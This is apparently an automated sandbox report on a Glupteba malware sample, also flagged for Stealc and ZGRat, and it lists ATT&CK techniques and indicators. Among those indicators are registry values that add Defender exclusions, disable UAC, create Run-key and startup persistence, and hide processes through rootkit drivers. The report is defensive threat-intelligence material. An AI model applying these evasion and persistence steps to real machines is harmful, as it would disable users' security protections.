glupteba | 0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129

Windows Service

T1543.003

Processes:

Ae6KcqZDG3RHyqUIPyDn6abJ.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Ae6KcqZDG3RHyqUIPyDn6abJ.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

Processes:

0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe

Windows security bypass 2 TTPs 48 IoCs

Disable or Modify Tools

Modify Registry

Processes:

reg.exereg.exereg.exereg.exeXFyfSPWtThhhYf9nK71Dwc6z.exeZHWH2GFKQja0muj4RLymlJe3.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\wGkeBUkfAIhWvVVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ZHWH2GFKQja0muj4RLymlJe3.exe = "0"	ZHWH2GFKQja0muj4RLymlJe3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ofqvFcNvzeRditbz = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RVqmAwyyxwiU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\wGkeBUkfAIhWvVVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ofqvFcNvzeRditbz = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ByWuwrOBU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ByWuwrOBU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DUGaRsFaSnqjC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RVqmAwyyxwiU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ARTXeDTAxvUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ofqvFcNvzeRditbz = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\XFyfSPWtThhhYf9nK71Dwc6z.exe = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ARTXeDTAxvUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ofqvFcNvzeRditbz = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DUGaRsFaSnqjC = "0"	reg.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

Ae6KcqZDG3RHyqUIPyDn6abJ.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Ae6KcqZDG3RHyqUIPyDn6abJ.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Ae6KcqZDG3RHyqUIPyDn6abJ.exe

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
2764	bcdedit.exe
1760	bcdedit.exe
2712	bcdedit.exe
1696	bcdedit.exe
1952	bcdedit.exe
2208	bcdedit.exe
2604	bcdedit.exe
1876	bcdedit.exe
392	bcdedit.exe
1540	bcdedit.exe
2028	bcdedit.exe
2372	bcdedit.exe
2160	bcdedit.exe
1492	bcdedit.exe

Blocklisted process makes network request 3 IoCs

Processes:

rundll32.exemsiexec.exe

flow pid process

89 3028 rundll32.exe
120 2412 msiexec.exe
122 2412 msiexec.exe
Downloads MZ/PE file

flow	pid	process
89	3028	rundll32.exe
120	2412	msiexec.exe
122	2412	msiexec.exe

Drops file in Drivers directory 4 IoCs

Processes:

csrss.exeMsiExec.exe

description	ioc	process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe
File opened for modification	C:\Windows\system32\DRIVERS\SETFAB4.tmp	MsiExec.exe
File created	C:\Windows\system32\DRIVERS\SETFAB4.tmp	MsiExec.exe
File opened for modification	C:\Windows\system32\DRIVERS\VBoxDrv.sys	MsiExec.exe

Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

1608 netsh.exe
768 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

pid	process
1608	netsh.exe
768	netsh.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

Install.exerundll32.exeAe6KcqZDG3RHyqUIPyDn6abJ.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Ae6KcqZDG3RHyqUIPyDn6abJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Ae6KcqZDG3RHyqUIPyDn6abJ.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

BEppgGl.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\International\Geo\Nation	BEppgGl.exe

Drops startup file 7 IoCs

Processes:

regsvcs.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MXaqfXYvNOLXmglotU55E8D4.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P6gybwY7loi9xmq1FNoNVDHB.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aGFon4Npz3PHx641hJuESICQ.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kzxHTaoQndUUw8xE5HwxgDXK.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HImiLTY5J8Ng67c1SBFvwwBB.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q6f7sYFkCwBTt92LP6ANImvB.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\USrK7LyL1eewkveQ3pD3DfYM.bat	regsvcs.exe

Executes dropped EXE 29 IoCs

Processes:

7wQhpSx1j6VjjJwiHraNyS7W.exeZHWH2GFKQja0muj4RLymlJe3.exeXFyfSPWtThhhYf9nK71Dwc6z.exeu180.0.exeXFyfSPWtThhhYf9nK71Dwc6z.exeZHWH2GFKQja0muj4RLymlJe3.exeAe6KcqZDG3RHyqUIPyDn6abJ.exeVlEvAYeyGWtNYpmsg8pkMJtj.exeInstall.exeQg_Appv5.execsrss.exeu180.1.exeUniversalInstaller.exeblelkQh.exeinjector.exeUniversalInstaller.exepatch.exeBEppgGl.exedsefix.exewindefender.exewindefender.exeYAS96WTmaOYBISF8paPzyxEg.exece-installer_7.14.2_vbox-6.1.20.exece_7.14.2_windows_x86_64.exeinjector.exeinjector.exeinjector.exeinjector.exeinjector.exe

pid	process
1584	7wQhpSx1j6VjjJwiHraNyS7W.exe
1900	ZHWH2GFKQja0muj4RLymlJe3.exe
2592	XFyfSPWtThhhYf9nK71Dwc6z.exe
320	u180.0.exe
1972	XFyfSPWtThhhYf9nK71Dwc6z.exe
2428	ZHWH2GFKQja0muj4RLymlJe3.exe
2972	Ae6KcqZDG3RHyqUIPyDn6abJ.exe
2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe
1204	Install.exe
1908	Qg_Appv5.exe
1548	csrss.exe
2752	u180.1.exe
2412	UniversalInstaller.exe
2244	blelkQh.exe
2724	injector.exe
604	UniversalInstaller.exe
588	patch.exe
1756	BEppgGl.exe
2656	dsefix.exe
2764	windefender.exe
1904	windefender.exe
2776	YAS96WTmaOYBISF8paPzyxEg.exe
880	ce-installer_7.14.2_vbox-6.1.20.exe
1752	ce_7.14.2_windows_x86_64.exe
2132	injector.exe
1600	injector.exe
2668	injector.exe
2168	injector.exe
3048	injector.exe

Loads dropped DLL 62 IoCs

Processes:

regsvcs.exe7wQhpSx1j6VjjJwiHraNyS7W.exeVlEvAYeyGWtNYpmsg8pkMJtj.exeInstall.exeXFyfSPWtThhhYf9nK71Dwc6z.exeUniversalInstaller.execsrss.exeUniversalInstaller.exepatch.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exerundll32.exeYAS96WTmaOYBISF8paPzyxEg.exeMsiExec.exeMsiExec.exe

pid	process
2008	regsvcs.exe
2008	regsvcs.exe
2008	regsvcs.exe
2008	regsvcs.exe
2008	regsvcs.exe
1584	7wQhpSx1j6VjjJwiHraNyS7W.exe
1584	7wQhpSx1j6VjjJwiHraNyS7W.exe
1584	7wQhpSx1j6VjjJwiHraNyS7W.exe
1584	7wQhpSx1j6VjjJwiHraNyS7W.exe
2008	regsvcs.exe
2008	regsvcs.exe
2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe
2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe
2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe
2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe
1204	Install.exe
1204	Install.exe
1204	Install.exe
1584	7wQhpSx1j6VjjJwiHraNyS7W.exe
1584	7wQhpSx1j6VjjJwiHraNyS7W.exe
1972	XFyfSPWtThhhYf9nK71Dwc6z.exe
1972	XFyfSPWtThhhYf9nK71Dwc6z.exe
1584	7wQhpSx1j6VjjJwiHraNyS7W.exe
1584	7wQhpSx1j6VjjJwiHraNyS7W.exe
1584	7wQhpSx1j6VjjJwiHraNyS7W.exe
1584	7wQhpSx1j6VjjJwiHraNyS7W.exe
2412	UniversalInstaller.exe
2412	UniversalInstaller.exe
1548	csrss.exe
2412	UniversalInstaller.exe
852
604	UniversalInstaller.exe
604	UniversalInstaller.exe
588	patch.exe
588	patch.exe
588	patch.exe
588	patch.exe
588	patch.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3028	rundll32.exe
3028	rundll32.exe
3028	rundll32.exe
3028	rundll32.exe
588	patch.exe
588	patch.exe
588	patch.exe
1548	csrss.exe
2008	regsvcs.exe
2776	YAS96WTmaOYBISF8paPzyxEg.exe
2928
2036	MsiExec.exe
2740	MsiExec.exe
2740	MsiExec.exe
2740	MsiExec.exe
2740	MsiExec.exe
2036	MsiExec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Registers COM server for autorun 1 TTPs 14 IoCs

persistence

Registry Run Keys / Startup Folder

Processes:

msiexec.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxC.dll"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxC.dll"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{B1A7A4F2-47B9-4A1E-82B2-07CCD5323C3F}\LocalServer32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32\ThreadingModel = "Both"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B1A7A4F2-47B9-4A1E-82B2-07CCD5323C3F}\LocalServer32\ = "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\""	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32\ThreadingModel = "Free"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxProxyStub.dll"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32\ThreadingModel = "Free"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{74AB5FFE-8726-4435-AA7E-876D705BCBA5}\LocalServer32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74AB5FFE-8726-4435-AA7E-876D705BCBA5}\LocalServer32\ = "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSDS.exe\""	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32	msiexec.exe

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
\Users\Admin\Pictures\Ae6KcqZDG3RHyqUIPyDn6abJ.exe	themida
behavioral1/memory/2972-352-0x000000013FFC0000-0x0000000140AA2000-memory.dmp	themida
behavioral1/memory/2972-356-0x000000013FFC0000-0x0000000140AA2000-memory.dmp	themida
behavioral1/memory/2972-365-0x000000013FFC0000-0x0000000140AA2000-memory.dmp	themida
behavioral1/memory/2972-366-0x000000013FFC0000-0x0000000140AA2000-memory.dmp	themida
behavioral1/memory/2972-367-0x000000013FFC0000-0x0000000140AA2000-memory.dmp	themida
behavioral1/memory/2972-368-0x000000013FFC0000-0x0000000140AA2000-memory.dmp	themida
behavioral1/memory/2972-443-0x000000013FFC0000-0x0000000140AA2000-memory.dmp	themida

Windows security modification 2 TTPs 8 IoCs

Disable or Modify Tools

Modify Registry

Processes:

XFyfSPWtThhhYf9nK71Dwc6z.exeZHWH2GFKQja0muj4RLymlJe3.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\XFyfSPWtThhhYf9nK71Dwc6z.exe = "0"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ZHWH2GFKQja0muj4RLymlJe3.exe = "0"	ZHWH2GFKQja0muj4RLymlJe3.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

Processes:

XFyfSPWtThhhYf9nK71Dwc6z.exeZHWH2GFKQja0muj4RLymlJe3.execsrss.exeYAS96WTmaOYBISF8paPzyxEg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	ZHWH2GFKQja0muj4RLymlJe3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	YAS96WTmaOYBISF8paPzyxEg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

System Information Discovery

Processes:

0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exeAe6KcqZDG3RHyqUIPyDn6abJ.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Ae6KcqZDG3RHyqUIPyDn6abJ.exe

Drops Chrome extension 2 IoCs

Processes:

BEppgGl.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	BEppgGl.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	BEppgGl.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 pastebin.com
7 pastebin.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

51 api.myip.com
54 ipinfo.io
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMon csrss.exe
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

flow	ioc
5	pastebin.com
7	pastebin.com

flow	ioc
51	api.myip.com
54	ipinfo.io

description	ioc	process
File opened for modification	\??\WinMon	csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 30 IoCs

Processes:

Ae6KcqZDG3RHyqUIPyDn6abJ.exeBEppgGl.exeMsiExec.exepowershell.exeblelkQh.exepowershell.exerundll32.exepowershell.exepowershell.exepowershell.EXE

description	ioc	process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Ae6KcqZDG3RHyqUIPyDn6abJ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	BEppgGl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	BEppgGl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	BEppgGl.exe
File created	C:\Windows\system32\DRVSTORE\VBoxDrv_B8F73A07F6EAC225F4EF78BAAC74D227A152D39D\VBoxDrv.cat	MsiExec.exe
